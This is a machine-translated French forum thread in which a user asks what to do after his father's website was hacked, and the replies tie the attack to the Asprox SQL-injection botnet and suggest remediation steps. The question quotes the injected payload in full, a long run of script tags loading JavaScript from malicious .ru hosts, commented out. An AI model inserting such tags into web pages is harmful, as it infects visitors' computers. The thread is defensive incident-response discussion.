Mon site piraté .. Que dois-je faire?

voix
18

Mon père m'a appelé et dit que les gens vont à son site Web recevaient 168 virus essayant de télécharger sur leur ordinateur. Il n'est pas technique du tout, et construit le tout avec un éditeur WYSIWYG.

J'ai sauté son site ouvert et regardé la source, et il y avait une ligne de Javascript comporte au bas de la source juste avant la balise HTML de fermeture. Ils ont inclus ce fichier (entre autres): http://www.98hs.ru/js.js <- COUPER JAVASCRIPT avant de passer à cette URL.

Donc, je commentais dehors pour l'instant. Il se trouve son mot de passe FTP est un mot de six lettres dictionnaire simple long, donc nous pensons que la façon dont il est piraté. Nous avons changé son mot de passe à une chaîne non-mot 8+ chiffres (il pas pour un mot de passe car il est une chasse-n-picorer typer).

Je l' ai fait un whois sur 98hs.ru et trouvé est hébergée par un serveur au Chili. Il est en fait une adresse e-mail associée à trop, mais je doute sérieusement que cette personne est le coupable. Probablement juste un autre site qui piraté ...

Je ne sais pas quoi faire à ce stade mais comme je l'ai jamais eu affaire à ce genre de chose auparavant. Quelqu'un at-il des suggestions?

Il utilisait un simple jane sécurisé ftp par webhost4life.com. Je ne vois même pas une façon de faire sftp sur leur site. Je pense son nom d' utilisateur et mot de passe se sont interceptés?

Donc, pour le rendre plus pertinent pour la communauté, quelles sont les étapes que vous devriez prendre / les meilleures pratiques à suivre pour protéger votre site de être piraté?

Pour mémoire, voici la ligne de code qui « magie » se est ajouté à son dossier (et pas dans son dossier sur son ordinateur - je l'ai laissé en commentaire juste pour absolue que ce ne fera rien sur cette page, même si je suis sûr que Jeff se prémunir contre cela):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Créé 06/08/2008 à 00:55
source utilisateur
Dans d'autres langues...                            


8 réponses

voix
14

Je sais que c'est un peu en retard dans le jeu, mais l'URL mentionné pour le JavaScript est mentionné dans une liste de sites connus pour avoir fait partie de la résurgence bot Asprox qui a commencé en Juin (au moins c'est quand nous obtenions battant pavillon avec il). Quelques détails à ce sujet sont mentionnés ci-dessous:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

La mauvaise chose à ce sujet est que effectivement tous les domaines de type varchar dans la base de données est « infecté » cracher une référence à cette URL, dans lequel le navigateur est un petit iframe qu'il se transforme en un robot. Un correctif SQL de base pour ce qui peut être trouvé ici:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

La chose effrayante est bien que le virus ressemble aux tables système pour les valeurs à infectent et beaucoup de plans d'hébergement partagé partagent également l'espace de base de données pour leurs clients. Donc, très probablement, il était le site de même pas votre père qui a été infecté, mais le site de quelqu'un d'autre au sein de son groupe d'hébergement qui a rédigé un code pauvre et a ouvert la porte à SQL attaque d'injection.

S'il n'a pas encore fait, j'envoyer un URGENT e-mail à leur hôte et leur donner un lien vers ce code SQL pour fixer l'ensemble du système. Vous pouvez fixer vos propres tables de base de données affectés, mais très probablement les robots qui font l'infection vont passer à travers ce nouveau trou et infecter tout le lot.

Espérons que cela vous donne un peu plus d'informations pour travailler avec.

EDIT: Encore une pensée rapide, s'il utilise l'un des hôtes d'outils de conception en ligne pour la construction de son site, tout ce contenu est probablement assis dans une colonne et a été infectée de cette façon.

Créé 07/08/2008 à 23:49
source utilisateur

voix
13

Essayez de rassembler autant d'informations que vous pouvez. Si l'hôte peut vous donner un journal indiquant toutes les connexions FTP qui ont été apportées à votre compte. Vous pouvez les utiliser pour voir si elle était encore une connexion FTP qui a été utilisé pour faire le changement et, éventuellement, obtenir une adresse IP.

Si vous utilisez un logiciel comme préemballées Wordpress, Drupal, ou toute autre chose que vous ne code pas qu'il peut y avoir des vulnérabilités dans le code de téléchargement qui permet ce type de modification. Si elle est construite sur mesure, vérifiez tous les endroits où vous permettent aux utilisateurs de télécharger des fichiers ou modifier des fichiers existants.

La deuxième chose serait de prendre une décharge du site comme ça, et tout vérifier pour d'autres modifications. Il peut juste être une modification unique qu'ils ont fait, mais s'ils sont arrivés via FTP qui sait quoi d'autre est là-bas.

Revert votre site retour à un statut bien connu et, le cas échéant, mettre à niveau vers la dernière version.

Il y a un niveau de rendement que vous devez prendre en compte aussi. Les dommages vaut la peine d'essayer de suivre la personne vers le bas ou est-ce quelque chose où vous venez de vivre et d'apprendre et d'utiliser des mots de passe forts?

Créé 06/08/2008 à 01:16
source utilisateur

voix
5

Vous mentionnez votre père utilisait un outil d'édition de site web.

Si l'outil d'édition publie de son ordinateur au serveur, il peut être le cas que ses fichiers locaux sont propres, et qu'il a juste besoin de republier au serveur.

Il devrait voir s'il y a une méthode de connexion différent à son serveur FTP que simple, mais ... ce n'est pas très sécurisé car il envoie son mot de passe en texte clair sur Internet.

Créé 06/08/2008 à 04:31
source utilisateur

voix
3

Avec un mot de passe de six caractères de mot, il a peut-être été forcée brute. C'est plus probable que son ftp intercepté, mais il pourrait être aussi.

Commencez par un mot de passe fort. (8 caractères est encore assez faible)

Voir si ce lien vers un internet blog sur la sécurité est utile.

Créé 06/08/2008 à 01:00
source utilisateur

voix
2

Le site est tout simplement HTML brut statique? à-dire qu'il n'a pas réussi à se coder une page de téléchargement qui permet à quiconque de conduire par de télécharger des scripts / pages compromis?

Pourquoi ne pas demander webhost4life s'ils ont des journaux FTP disponibles et signaler le problème pour eux. Vous ne savez jamais, ils peuvent être très réceptifs et trouver pour vous exactement ce qui est arrivé?

Je travaille pour une commune et nous avons toujours hoster bienvenue des rapports tels que ceux-ci et peuvent généralement identifier le vecteur exact d'attaque basée et conseiller quant à l'endroit où le client a mal tourné.

Créé 06/08/2008 à 01:24
source utilisateur

voix
0

Ce qui est arrivé à un de mes clients récemment qui a été hébergé sur iPower. Je ne suis pas sûr que votre environnement d'hébergement a été Apache basé, mais si elle était être sûr de vérifier les fichiers .htaccess que vous n'avez pas créé, en particulier au-dessus du Webroot et à l'intérieur des répertoires d'images, car ils ont tendance à injecter un peu de méchanceté là-bas ainsi (ils ont été réorientent personnes selon l'endroit où ils venaient la consulter). Jetez également un tout que vous avez créé pour le code que vous n'avez pas écrit.

Créé 26/09/2008 à 21:21
source utilisateur

voix
0

Débranchez le serveur Web sans l'arrêter pour éviter des scripts d'arrêt. Analyser le disque dur via un autre ordinateur comme un lecteur de données et voir si vous pouvez déterminer le coupable dans les fichiers journaux et des choses de cette nature. Vérifiez que le code est sûr et puis restaurer à partir d'une sauvegarde.

Créé 26/09/2008 à 21:12
source utilisateur

voix
-1

Nous avions été piraté de même gars apparemment! Ou bots, dans notre cas. Ils ont utilisé une injection SQL dans l'URL sur certains anciens sites ASP classiques que personne ne plus maintiennent. Nous avons trouvé l'attaque et les adresses IP bloquées dans IIS. Maintenant, nous devons factoriser tous les anciens ASP. Donc, mon conseil est de jeter un oeil à journaux IIS d'abord, pour trouver si le problème est dans le code ou la configuration du serveur de votre site.

Créé 16/08/2008 à 17:35
source utilisateur

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more